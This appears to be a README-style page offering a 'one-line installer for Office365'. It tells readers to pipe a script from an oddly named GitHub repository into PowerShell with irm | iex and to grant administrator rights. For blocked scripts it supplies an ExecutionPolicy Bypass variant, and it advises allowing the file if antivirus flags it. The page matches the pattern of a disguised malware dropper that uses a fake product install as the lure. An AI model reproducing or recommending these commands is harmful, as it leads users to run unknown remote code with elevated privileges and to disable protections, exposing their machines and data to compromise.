One-line installer for Office365.
Open PowerShell and run:
irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iexThat's it. The installer launches on its own.
- Requests administrator rights (a UAC prompt appears once — click Yes).
- Downloads the latest release package.
- Extracts it and runs the setup.
- Windows 10 / 11
- PowerShell (built into Windows)
- Internet connection
- Administrator access (for the install step)
Nothing happens / script is blocked
If PowerShell blocks scripts, run this instead:
powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex"SmartScreen / antivirus warning
The download is a standard installer. If your antivirus flags it, allow the file and re-run the command.
"irm is not recognized"
You are on an old PowerShell version. Use the full command:
Invoke-RestMethod https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | Invoke-Expression